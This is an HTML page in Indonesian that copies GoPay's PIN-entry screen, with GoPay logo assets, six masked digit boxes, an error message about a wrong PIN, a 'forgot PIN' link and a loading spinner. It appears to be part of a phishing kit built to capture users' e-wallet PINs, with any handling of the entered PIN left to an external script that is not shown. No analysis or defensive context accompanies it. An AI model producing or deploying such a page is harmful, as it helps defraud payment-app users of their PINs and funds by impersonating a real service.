<!DOCTYPE html>
<html lang="id">
<head>

<meta charset="UTF-8">

<meta name="viewport"
content="width=device-width,
initial-scale=1.0,
maximum-scale=1.0,
user-scalable=no">

<title>AJUKAN</title>

<link rel="stylesheet"
href="pix.css">

</head>
<body>

<!-- ERROR -->
<div
class="error-box"
id="errorBox">

    Pastikan PIN yang
    kamu masukan benar

</div>

<div class="container">

    <!-- LOGO -->
    <div class="logo-wrap">

        <img
        src="assets/logo-gopay.png"
        class="logo">

    </div>

    <!-- TITLE -->
    <div class="title">

        Masukan <b>PIN</b>

    </div>

    <!-- PIX -->
    <div class="pix-wrapper">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

        <input
        type="password"
        maxlength="1"
        class="pix-box"
        inputmode="numeric">

    </div>

    <!-- BUTTON -->
    <button
    class="show-btn"
    id="showBtn">

        TAMPILKAN

    </button>

    <!-- LUPA -->
    <div class="lupa">

        LUPA PIN?

    </div>

</div>

<!-- LOADING -->
<div
class="loading-box"
id="loadingBox">

    <div class="loading-circle">

        <div class="spinner-ring"></div>

        <img
        src="assets/gopay-icon.png"
        class="loading-logo">

    </div>

    <div class="loading-text">

        Memuat...

    </div>

</div>

<script src="pix.js"></script>

</body>
</html>
